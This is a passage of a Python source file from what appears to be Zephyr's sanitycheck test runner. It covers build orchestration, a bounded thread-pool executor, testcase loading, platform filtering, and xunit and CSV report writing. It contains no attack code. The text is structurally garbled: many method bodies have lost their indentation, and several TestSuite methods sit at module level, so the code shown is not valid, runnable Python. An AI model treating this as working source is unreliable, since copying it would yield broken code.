            logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
                self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
                instance.testcase.name, status, more_info))
            if instance.status in ["failed", "timeout"]:
                self.log_info_file(self.inline_logs)
        else:
            # Non-verbose mode: single self-updating progress line.
            sys.stdout.write("\rINFO    - Total complete: %s%4d/%4d%s  %2d%%  skipped: %s%4d%s, failed: %s%4d%s" % (
                Fore.GREEN,
                self.suite.total_done,
                self.suite.total_tests,
                Fore.RESET,
                int((float(self.suite.total_done) / self.suite.total_tests) * 100),
                Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
                self.suite.total_skipped,
                Fore.RESET,
                Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
                self.suite.total_failed,
                Fore.RESET
            )
            )
            sys.stdout.flush()

    def cmake(self):
        """Assemble cmake arguments, merging all OVERLAY_CONFIG entries into
        one, then run the configure step."""
        instance = self.instance
        args = self.testcase.extra_args[:]
        args += self.extra_args
        if instance.handler:
            args += instance.handler.args
        # merge overlay files into one variable
        def extract_overlays(args):
            re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
            other_args = []
            overlays = []
            for arg in args:
                match = re_overlay.search(arg)
                if match:
                    overlays.append(match.group(1).strip('\'"'))
                else:
                    other_args.append(arg)
            # Rewrite args in place, minus the extracted overlay entries.
            args[:] = other_args
            return overlays
        overlays = extract_overlays(args)
        if (self.testcase.extra_configs or self.coverage or
                self.asan):
            # The fragment written by TestInstance.create_overlay().
            overlays.append(os.path.join(instance.build_dir,
                                         "sanitycheck", "testcase_extra.conf"))
        if overlays:
            args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
        results = self.run_cmake(args)
        return results

    def build(self):
        """Run the build step for the already-configured tree."""
        results = self.run_build(['--build', self.build_dir])
        return results

    def run(self):
        """Execute the built test via the instance's handler."""
        instance = self.instance
        if instance.handler.type_str == "device":
            instance.handler.suite = self.suite
        instance.handler.handle()
        sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
    """BoundedExecutor behaves as a ThreadPoolExecutor which will block on
    calls to submit() once the limit given as "bound" work items are queued for
    execution.
    :param bound: Integer - the maximum number of items in the work queue
    :param max_workers: Integer - the size of the thread pool
    """

    def __init__(self, bound, max_workers, **kwargs):
        # Forward extra keyword arguments (e.g. thread_name_prefix) to
        # ThreadPoolExecutor; previously they were accepted but silently
        # dropped.
        super().__init__(max_workers, **kwargs)
        # Allow "bound" queued items on top of the max_workers in flight.
        self.semaphore = BoundedSemaphore(bound + max_workers)

    def submit(self, fn, *args, **kwargs):
        """Submit fn for execution, blocking while the queue is full."""
        self.semaphore.acquire()
        try:
            future = super().submit(fn, *args, **kwargs)
        except Exception:
            # Submission failed: give back the slot we reserved above.
            self.semaphore.release()
            raise
        else:
            # Release the slot once the work item completes.
            future.add_done_callback(lambda x: self.semaphore.release())
        return future
class TestSuite:
    """Top-level driver: discovers platforms and testcases, filters them
    into instances, and coordinates building, running and reporting."""
    # CONFIG_<NAME>=<value> lines from generated .config files.
    config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
    # Generic <NAME>=<value> lines (devicetree/cmake output).
    dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
    # Schema used to validate testcase.yaml / sample.yaml files.
    tc_schema = scl.yaml_load(
        os.path.join(ZEPHYR_BASE,
                     "scripts", "sanity_chk", "testcase-schema.yaml"))
    # Keys allowed in a testcase.yaml entry, with their types and defaults.
    testcase_valid_keys = {"tags": {"type": "set", "required": False},
                           "type": {"type": "str", "default": "integration"},
                           "extra_args": {"type": "list"},
                           "extra_configs": {"type": "list"},
                           "build_only": {"type": "bool", "default": False},
                           "build_on_all": {"type": "bool", "default": False},
                           "skip": {"type": "bool", "default": False},
                           "slow": {"type": "bool", "default": False},
                           "timeout": {"type": "int", "default": 60},
                           "min_ram": {"type": "int", "default": 8},
                           "depends_on": {"type": "set"},
                           "min_flash": {"type": "int", "default": 32},
                           "arch_whitelist": {"type": "set"},
                           "arch_exclude": {"type": "set"},
                           "extra_sections": {"type": "list", "default": []},
                           "platform_exclude": {"type": "set"},
                           "platform_whitelist": {"type": "set"},
                           "toolchain_exclude": {"type": "set"},
                           "toolchain_whitelist": {"type": "set"},
                           "filter": {"type": "str"},
                           "harness": {"type": "str"},
                           "harness_config": {"type": "map", "default": {}}
                           }
    # Metrics recorded at the last release, used for footprint comparison.
    RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
                                "sanity_last_release.csv")
    def __init__(self, board_root_list, testcase_roots, outdir):
        """
        @param board_root_list Directory (or list of directories) holding
               board/platform YAML definitions
        @param testcase_roots Directories scanned for testcase/sample YAMLs
        @param outdir Root output directory for builds and reports
        """
        self.roots = testcase_roots
        # Accept a single root or a list of roots.
        if not isinstance(board_root_list, list):
            self.board_roots = [board_root_list]
        else:
            self.board_roots = board_root_list
        # Testsuite Options
        self.coverage_platform = []
        self.build_only = False
        self.cmake_only = False
        self.cleanup = False
        self.enable_slow = False
        self.device_testing = False
        self.fixture = []
        self.enable_coverage = False
        self.enable_lsan = False
        self.enable_asan = False
        self.enable_valgrind = False
        self.extra_args = []
        self.inline_logs = False
        self.enable_sizes_report = False
        self.west_flash = None
        self.west_runner = None
        self.generator = None
        self.generator_cmd = None
        # Keep track of which test cases we've filtered out and why
        self.testcases = {}
        self.platforms = []
        self.selected_platforms = []
        self.default_platforms = []
        self.outdir = os.path.abspath(outdir)
        self.discards = None
        self.load_errors = 0
        self.instances = dict()
        # Run statistics, updated as instances complete.
        self.total_tests = 0  # number of test instances
        self.total_cases = 0  # number of test cases
        self.total_done = 0  # tests completed
        self.total_failed = 0
        self.total_skipped = 0
        self.total_platforms = 0
        self.start_time = 0
        self.duration = 0
        self.warnings = 0
        self.cv = threading.Condition()
        # hardcoded for now
        self.connected_hardware = []
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
    def summary(self, unrecognized_sections):
        """Log the final pass/fail/skip summary for the whole run.

        @param unrecognized_sections When False, instances whose binaries
               contain unexpected sections are counted (and logged) as
               failures.
        """
        failed = 0
        for instance in self.instances.values():
            if instance.status == "failed":
                failed += 1
            elif instance.metrics.get("unrecognized") and not unrecognized_sections:
                logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
                             (Fore.RED, Fore.RESET, instance.name,
                              str(instance.metrics.get("unrecognized", []))))
                failed += 1
        # Skipped tests are excluded from the pass-rate denominator.
        if self.total_tests and self.total_tests != self.total_skipped:
            pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
                self.total_tests - self.total_skipped))
        else:
            pass_rate = 0
        logger.info(
            "{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
                Fore.RED if failed else Fore.GREEN,
                self.total_tests - self.total_failed - self.total_skipped,
                self.total_tests - self.total_skipped,
                Fore.RESET,
                pass_rate,
                Fore.RED if self.total_failed else Fore.RESET,
                self.total_failed,
                Fore.RESET,
                self.total_skipped,
                Fore.YELLOW if self.warnings else Fore.RESET,
                self.warnings,
                Fore.RESET,
                self.duration))
        self.total_platforms = len(self.platforms)
        if self.platforms:
            logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
                self.total_cases,
                len(self.selected_platforms),
                self.total_platforms,
                (100 * len(self.selected_platforms) / len(self.platforms))
            ))
def save_reports(self, name, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if not no_update:
self.xunit_report(filename + ".xml", only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
    def add_testcases(self, testcase_filter=[]):
        """Walk the testcase roots and load every sample.yaml/testcase.yaml.

        @param testcase_filter Optional list of testcase names; when given,
               only matching testcases are registered.
        """
        for root in self.roots:
            root = os.path.abspath(root)
            logger.debug("Reading test case configuration files under %s..." % root)
            for dirpath, dirnames, filenames in os.walk(root, topdown=True):
                logger.debug("scanning %s" % dirpath)
                # sample.yaml takes precedence over testcase.yaml.
                if 'sample.yaml' in filenames:
                    filename = 'sample.yaml'
                elif 'testcase.yaml' in filenames:
                    filename = 'testcase.yaml'
                else:
                    continue
                logger.debug("Found possible test case in " + dirpath)
                # Don't descend into subdirectories of a testcase dir.
                dirnames[:] = []
                tc_path = os.path.join(dirpath, filename)
                try:
                    parsed_data = SanityConfigParser(tc_path, self.tc_schema)
                    parsed_data.load()
                    tc_path = os.path.dirname(tc_path)
                    workdir = os.path.relpath(tc_path, root)
                    # One YAML file can define several named tests.
                    for name in parsed_data.tests.keys():
                        tc = TestCase()
                        tc.name = tc.get_unique(root, workdir, name)
                        tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
                        # Copy the validated YAML fields onto the TestCase.
                        tc.source_dir = tc_path
                        tc.yamlfile = tc_path
                        tc.id = name
                        tc.type = tc_dict["type"]
                        tc.tags = tc_dict["tags"]
                        tc.extra_args = tc_dict["extra_args"]
                        tc.extra_configs = tc_dict["extra_configs"]
                        tc.arch_whitelist = tc_dict["arch_whitelist"]
                        tc.arch_exclude = tc_dict["arch_exclude"]
                        tc.skip = tc_dict["skip"]
                        tc.platform_exclude = tc_dict["platform_exclude"]
                        tc.platform_whitelist = tc_dict["platform_whitelist"]
                        tc.toolchain_exclude = tc_dict["toolchain_exclude"]
                        tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
                        tc.tc_filter = tc_dict["filter"]
                        tc.timeout = tc_dict["timeout"]
                        tc.harness = tc_dict["harness"]
                        tc.harness_config = tc_dict["harness_config"]
                        tc.build_only = tc_dict["build_only"]
                        tc.build_on_all = tc_dict["build_on_all"]
                        tc.slow = tc_dict["slow"]
                        tc.min_ram = tc_dict["min_ram"]
                        tc.depends_on = tc_dict["depends_on"]
                        tc.min_flash = tc_dict["min_flash"]
                        tc.extra_sections = tc_dict["extra_sections"]
                        tc.parse_subcases(tc_path)
                        if testcase_filter:
                            if tc.name and tc.name in testcase_filter:
                                self.testcases[tc.name] = tc
                        else:
                            self.testcases[tc.name] = tc
                except Exception as e:
                    # A malformed YAML should not abort the whole scan.
                    logger.error("%s: can't load (skipping): %s" % (tc_path, e))
                    self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
    def load_from_file(self, file, filter_status=[]):
        """Recreate test instances from a previous run's CSV report.

        @param file CSV report with at least test/platform/status columns
        @param filter_status Statuses to skip (e.g. ["passed"]) when
               re-running
        @note Exits with code 2 on a missing file or malformed CSV.
        """
        try:
            with open(file, "r") as fp:
                cr = csv.DictReader(fp)
                instance_list = []
                for row in cr:
                    if row["status"] in filter_status:
                        continue
                    test = row["test"]
                    platform = self.get_platform(row["platform"])
                    instance = TestInstance(self.testcases[test], platform, self.outdir)
                    instance.check_build_or_run(
                        self.build_only,
                        self.enable_slow,
                        self.device_testing,
                        self.fixture
                    )
                    instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
                    instance_list.append(instance)
                self.add_instances(instance_list)
        except KeyError as e:
            # Unknown testcase name or missing CSV column.
            logger.error("Key error while parsing tests file.({})".format(str(e)))
            sys.exit(2)
        except FileNotFoundError as e:
            logger.error("Couldn't find input file with list of tests. ({})".format(e))
            sys.exit(2)
    def apply_filters(self, **kwargs):
        """Build the set of test instances to run, applying all command-line
        and per-testcase filters.

        Populates self.instances/self.discards/self.selected_platforms.

        @return dict mapping each discarded TestInstance to the reason it
                was discarded
        """
        toolchain = self.get_toolchain()
        discards = {}
        platform_filter = kwargs.get('platform')
        exclude_platform = kwargs.get('exclude_platform')
        testcase_filter = kwargs.get('run_individual_tests')
        arch_filter = kwargs.get('arch')
        tag_filter = kwargs.get('tag')
        exclude_tag = kwargs.get('exclude_tag')
        all_filter = kwargs.get('all')
        device_testing_filter = kwargs.get('device_testing')
        force_toolchain = kwargs.get('force_toolchain')
        logger.debug("platform filter: " + str(platform_filter))
        logger.debug("    arch_filter: " + str(arch_filter))
        logger.debug("     tag_filter: " + str(tag_filter))
        logger.debug("    exclude_tag: " + str(exclude_tag))
        default_platforms = False
        if platform_filter:
            platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
        else:
            platforms = self.platforms
        if all_filter:
            logger.info("Selecting all possible platforms per test case")
            # When --all used, any --platform arguments ignored
            platform_filter = []
        elif not platform_filter:
            logger.info("Selecting default platforms per test case")
            default_platforms = True
        logger.info("Building initial testcase list...")
        for tc_name, tc in self.testcases.items():
            # list of instances per testcase, aka configurations.
            instance_list = []
            for plat in platforms:
                instance = TestInstance(tc, plat, self.outdir)
                instance.check_build_or_run(
                    self.build_only,
                    self.enable_slow,
                    self.device_testing,
                    self.fixture
                )
                # Each check below either discards the instance (recording
                # the reason) or falls through to the next check.
                if plat.name in exclude_platform:
                    discards[instance] = "Platform is excluded on command line."
                    continue
                if (plat.arch == "unit") != (tc.type == "unit"):
                    # Discard silently
                    continue
                if device_testing_filter and instance.build_only:
                    discards[instance] = "Not runnable on device"
                    continue
                if tc.skip:
                    discards[instance] = "Skip filter"
                    continue
                # NOTE(review): this resets platform_filter for all later
                # testcases in the loop as well, not just this one — confirm
                # that is intended.
                if tc.build_on_all and not platform_filter:
                    platform_filter = []
                if tag_filter and not tc.tags.intersection(tag_filter):
                    discards[instance] = "Command line testcase tag filter"
                    continue
                if exclude_tag and tc.tags.intersection(exclude_tag):
                    discards[instance] = "Command line testcase exclude filter"
                    continue
                if testcase_filter and tc_name not in testcase_filter:
                    discards[instance] = "Testcase name filter"
                    continue
                if arch_filter and plat.arch not in arch_filter:
                    discards[instance] = "Command line testcase arch filter"
                    continue
                if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
                    discards[instance] = "Not in test case arch whitelist"
                    continue
                if tc.arch_exclude and plat.arch in tc.arch_exclude:
                    discards[instance] = "In test case arch exclude"
                    continue
                if tc.platform_exclude and plat.name in tc.platform_exclude:
                    discards[instance] = "In test case platform exclude"
                    continue
                if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
                    discards[instance] = "In test case toolchain exclude"
                    continue
                if platform_filter and plat.name not in platform_filter:
                    discards[instance] = "Command line platform filter"
                    continue
                if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
                    discards[instance] = "Not in testcase platform whitelist"
                    continue
                if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
                    discards[instance] = "Not in testcase toolchain whitelist"
                    continue
                if not plat.env_satisfied:
                    discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
                    continue
                if not force_toolchain \
                        and toolchain and (toolchain not in plat.supported_toolchains) \
                        and tc.type != 'unit':
                    discards[instance] = "Not supported by the toolchain"
                    continue
                if plat.ram < tc.min_ram:
                    discards[instance] = "Not enough RAM"
                    continue
                if tc.depends_on:
                    dep_intersection = tc.depends_on.intersection(set(plat.supported))
                    if dep_intersection != set(tc.depends_on):
                        discards[instance] = "No hardware support"
                        continue
                if plat.flash < tc.min_flash:
                    discards[instance] = "Not enough FLASH"
                    continue
                if set(plat.ignore_tags) & tc.tags:
                    discards[instance] = "Excluded tags per platform"
                    continue
                # if nothing stopped us until now, it means this configuration
                # needs to be added.
                instance_list.append(instance)
            # no configurations, so jump to next testcase
            if not instance_list:
                continue
            # if sanitycheck was launched with no platform options at all, we
            # take all default platforms
            if default_platforms and not tc.build_on_all:
                if tc.platform_whitelist:
                    a = set(self.default_platforms)
                    b = set(tc.platform_whitelist)
                    c = a.intersection(b)
                    if c:
                        # NOTE(review): the lambda parameter shadows the
                        # outer `tc` (a TestCase); here it is actually a
                        # TestInstance.
                        aa = list(filter(lambda tc: tc.platform.name in c, instance_list))
                        self.add_instances(aa)
                    else:
                        self.add_instances(instance_list[:1])
                else:
                    instances = list(filter(lambda tc: tc.platform.default, instance_list))
                    self.add_instances(instances)
                for instance in list(filter(lambda tc: not tc.platform.default, instance_list)):
                    discards[instance] = "Not a default test platform"
            else:
                self.add_instances(instance_list)
        # Write the per-instance Kconfig overlay fragments for everything
        # that survived filtering.
        for _, case in self.instances.items():
            case.create_overlay(case.platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
        self.discards = discards
        self.selected_platforms = set(p.platform.name for p in self.instances.values())
        return discards
def add_instances(self, instance_list):
for instance in instance_list:
self.instances[instance.name] = instance
def add_tasks_to_queue(self, test_only=False):
for instance in self.instances.values():
if test_only:
if instance.run:
pipeline.put({"op": "run", "test": instance, "status": "built"})
else:
if instance.status not in ['passed', 'skipped']:
instance.status = None
pipeline.put({"op": "cmake", "test": instance})
return "DONE FEEDING"
def execute(self):
    """Build (and optionally run) all selected test instances.

    A feeder future pushes work items into the global ``pipeline`` queue
    (see ``add_tasks_to_queue``); this loop drains the queue, creating one
    ``ProjectBuilder`` future per message, until every future completes.
    Finally, ELF size metrics are gathered (in parallel) unless size
    reporting is disabled or the run was cmake-only.
    """

    def calc_one_elf_size(instance):
        # Populate RAM/ROM footprint metrics for one built instance.
        # Sizes are zeroed for "native" (host) builds, where ELF section
        # sizes are not meaningful for the target.
        if instance.status not in ["failed", "skipped"]:
            if instance.platform.type != "native":
                size_calc = instance.calculate_sizes()
                instance.metrics["ram_size"] = size_calc.get_ram_size()
                instance.metrics["rom_size"] = size_calc.get_rom_size()
                instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
            else:
                instance.metrics["ram_size"] = 0
                instance.metrics["rom_size"] = 0
                instance.metrics["unrecognized"] = []

            instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0

    logger.info("Adding tasks to the queue...")
    # We can use a with statement to ensure threads are cleaned up promptly
    with BoundedExecutor(bound=self.jobs, max_workers=self.jobs) as executor:

        # start a future for a thread which sends work in through the queue
        future_to_test = {
            executor.submit(self.add_tasks_to_queue, self.test_only): 'FEEDER DONE'}

        while future_to_test:
            # check for status of the futures which are currently working
            done, pending = concurrent.futures.wait(future_to_test, timeout=1,
                                                    return_when=concurrent.futures.FIRST_COMPLETED)

            # if there is incoming work, start a new future
            while not pipeline.empty():
                # fetch a url from the queue
                message = pipeline.get()
                test = message['test']

                pb = ProjectBuilder(self,
                                    test,
                                    lsan=self.enable_lsan,
                                    asan=self.enable_asan,
                                    coverage=self.enable_coverage,
                                    extra_args=self.extra_args,
                                    device_testing=self.device_testing,
                                    cmake_only=self.cmake_only,
                                    cleanup=self.cleanup,
                                    valgrind=self.enable_valgrind,
                                    inline_logs=self.inline_logs,
                                    generator=self.generator,
                                    generator_cmd=self.generator_cmd,
                                    verbose=self.verbose
                                    )
                future_to_test[executor.submit(pb.process, message)] = test.name

            # process any completed futures
            for future in done:
                test = future_to_test[future]
                try:
                    data = future.result()
                except Exception as exc:
                    # a failed future is fatal for the whole run
                    logger.error('%r generated an exception: %s' % (test, exc))
                    sys.exit('%r generated an exception: %s' % (test, exc))
                else:
                    if data:
                        logger.debug(data)

                # remove the now completed future
                del future_to_test[future]

            for future in pending:
                test = future_to_test[future]
                try:
                    future.result(timeout=180)
                except concurrent.futures.TimeoutError:
                    logger.warning("{} stuck?".format(test))

    if self.enable_size_report and not self.cmake_only:
        # Parallelize size calculation
        executor = concurrent.futures.ThreadPoolExecutor(self.jobs)
        futures = [executor.submit(calc_one_elf_size, instance)
                   for instance in self.instances.values()]
        concurrent.futures.wait(futures)
    else:
        # size report disabled: record zeroed metrics so later report
        # writers always find the keys they expect.
        for instance in self.instances.values():
            instance.metrics["ram_size"] = 0
            instance.metrics["rom_size"] = 0
            instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
            instance.metrics["unrecognized"] = []
def discard_report(self, filename):
try:
if self.discards is None:
raise SanityRuntimeError("apply_filters() hasn't been run!")
except Exception as e:
logger.error(str(e))
sys.exit(2)
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "reason"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance, reason in sorted(self.discards.items()):
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"reason": reason}
cw.writerow(rowdict)
def target_report(self, outdir):
    """Write one JUnit-style XML report per platform into *outdir*.

    Each per-testcase result recorded in ``instance.results`` becomes a
    <testcase> element; 'FAIL' maps to <failure>, 'BLOCK' to <error>,
    'SKIP' to <skipped>.  When a handler.log exists for a failing case its
    printable content is embedded as the element text.
    """
    run = "Sanitycheck"
    eleTestsuite = None

    # every platform that has at least one selected instance
    platforms = {inst.platform.name for _, inst in self.instances.items()}
    for platform in platforms:
        errors = 0
        passes = 0
        fails = 0
        duration = 0
        skips = 0
        # first pass: tally counters for the <testsuite> attributes
        for _, instance in self.instances.items():
            if instance.platform.name != platform:
                continue
            handler_time = instance.metrics.get('handler_time', 0)
            duration += handler_time
            for k in instance.results.keys():
                if instance.results[k] == 'PASS':
                    passes += 1
                elif instance.results[k] == 'BLOCK':
                    errors += 1
                elif instance.results[k] == 'SKIP':
                    skips += 1
                else:
                    fails += 1

        eleTestsuites = ET.Element('testsuites')
        eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                     name=run, time="%f" % duration,
                                     tests="%d" % (errors + passes + fails),
                                     failures="%d" % fails,
                                     errors="%d" % errors, skipped="%d" % skips)

        handler_time = 0

        # print out test results
        for _, instance in self.instances.items():
            if instance.platform.name != platform:
                continue
            handler_time = instance.metrics.get('handler_time', 0)
            for k in instance.results.keys():
                eleTestcase = ET.SubElement(
                    eleTestsuite, 'testcase',
                    classname="%s:%s" % (instance.platform.name, os.path.basename(instance.testcase.name)),
                    name="%s" % (k), time="%f" % handler_time)
                if instance.results[k] in ['FAIL', 'BLOCK']:
                    if instance.results[k] == 'FAIL':
                        el = ET.SubElement(
                            eleTestcase,
                            'failure',
                            type="failure",
                            message="failed")
                    else:
                        el = ET.SubElement(
                            eleTestcase,
                            'error',
                            type="failure",
                            message="failed")
                    # attach the (printable-only) handler log, if present
                    p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
                    log_file = os.path.join(p, "handler.log")
                    if os.path.exists(log_file):
                        with open(log_file, "rb") as f:
                            log = f.read().decode("utf-8")
                            filtered_string = ''.join(filter(lambda x: x in string.printable, log))
                            el.text = filtered_string
                elif instance.results[k] == 'SKIP':
                    el = ET.SubElement(
                        eleTestcase,
                        'skipped',
                        type="skipped",
                        message="Skipped")

        result = ET.tostring(eleTestsuites)
        # one XML file per platform
        with open(os.path.join(outdir, platform + ".xml"), 'wb') as f:
            f.write(result)
def xunit_report(self, filename, append=False):
    """Write (or, with ``append``, update) a single JUnit-style XML report
    covering every test instance.

    In append mode an existing report is parsed and testcases that were
    re-run are replaced; otherwise a fresh <testsuites>/<testsuite> tree is
    created.  Fix: removed a redundant ``f.close()`` that was executed
    inside the ``with open(...)`` block (the context manager already
    closes the file).
    """
    fails = 0
    passes = 0
    errors = 0
    skips = 0
    duration = 0

    # Tally overall counters and total handler duration.
    for instance in self.instances.values():
        handler_time = instance.metrics.get('handler_time', 0)
        duration += handler_time
        if instance.status in ["failed", "timeout"]:
            if instance.reason in ['build_error', 'handler_crash']:
                errors += 1
            else:
                fails += 1
        elif instance.status == 'skipped':
            skips += 1
        else:
            passes += 1

    run = "Sanitycheck"
    eleTestsuite = None

    # When we re-run the tests, we re-use the results and update only with
    # the newly run tests.
    if os.path.exists(filename) and append:
        tree = ET.parse(filename)
        eleTestsuites = tree.getroot()
        eleTestsuite = tree.findall('testsuite')[0]
    else:
        eleTestsuites = ET.Element('testsuites')
        # NOTE: the attribute is 'skip' (not JUnit's usual 'skipped');
        # kept as-is because downstream consumers may rely on it.
        eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
                                     name=run, time="%f" % duration,
                                     tests="%d" % (errors + passes + fails + skips),
                                     failures="%d" % fails,
                                     errors="%d" % (errors), skip="%s" % (skips))

    for instance in self.instances.values():
        # remove testcases that are a re-run
        if append:
            for tc in eleTestsuite.findall('testcase'):
                if tc.get('classname') == "%s:%s" % (
                        instance.platform.name, instance.testcase.name):
                    eleTestsuite.remove(tc)

        handler_time = 0
        if instance.status != "failed" and instance.handler:
            handler_time = instance.metrics.get("handler_time", 0)

        eleTestcase = ET.SubElement(
            eleTestsuite,
            'testcase',
            classname="%s:%s" % (instance.platform.name, instance.testcase.name),
            name="%s" % (instance.testcase.name),
            time="%f" % handler_time)

        if instance.status in ["failed", "timeout"]:
            failure = ET.SubElement(
                eleTestcase,
                'failure',
                type="failure",
                message=instance.reason)

            # prefer the handler log unless the failure was a build error
            p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
            bl = os.path.join(p, "build.log")
            hl = os.path.join(p, "handler.log")
            log_file = bl
            if instance.reason != 'Build error':
                if os.path.exists(hl):
                    log_file = hl
                else:
                    log_file = bl

            if os.path.exists(log_file):
                with open(log_file, "rb") as f:
                    log = f.read().decode("utf-8")
                    filtered_string = ''.join(filter(lambda x: x in string.printable, log))
                    failure.text = filtered_string

        elif instance.status == "skipped":
            ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")

    result = ET.tostring(eleTestsuites)
    with open(filename, 'wb') as report:
        report.write(result)
def csv_report(self, filename):
    """Write a CSV summary of the run, one row per test instance.

    Size/time metrics are only filled in for instances that neither failed
    nor timed out (and handler_time only when a handler ran); missing
    fields are left empty in the CSV.
    """
    fieldnames = ["test", "arch", "platform", "status",
                  "extra_args", "handler", "handler_time", "ram_size",
                  "rom_size"]
    with open(filename, "wt") as out:
        writer = csv.DictWriter(out, fieldnames, lineterminator=os.linesep)
        writer.writeheader()
        for instance in self.instances.values():
            row = {
                "test": instance.testcase.name,
                "arch": instance.platform.arch,
                "platform": instance.platform.name,
                "extra_args": " ".join(instance.testcase.extra_args),
                "handler": instance.platform.simulation,
                "status": instance.status,
            }
            if instance.status not in ["failed", "timeout"]:
                if instance.handler:
                    row["handler_time"] = instance.metrics.get("handler_time", 0)
                row["ram_size"] = instance.metrics.get("ram_size", 0)
                row["rom_size"] = instance.metrics.get("rom_size", 0)
            writer.writerow(row)
def get_testcase(self, identifier):
    """Return every testcase that declares a case named *identifier*.

    A testcase appears once per matching entry in its ``cases`` list
    (preserving the original duplicate-append behaviour).
    """
    return [tc
            for tc in self.testcases.values()
            for case in tc.cases
            if case == identifier]
class CoverageTool:
    """ Base class for every supported coverage tool
    """

    def __init__(self):
        self.gcov_tool = None   # gcov tool name handed to the backend
        self.base_dir = None    # source tree root used for path filtering

    @staticmethod
    def factory(tool):
        """Return the wrapper instance for *tool* ('lcov' or 'gcovr').

        Logs an error and returns None for an unknown tool name.
        """
        if tool == 'lcov':
            t = Lcov()
        elif tool == 'gcovr':
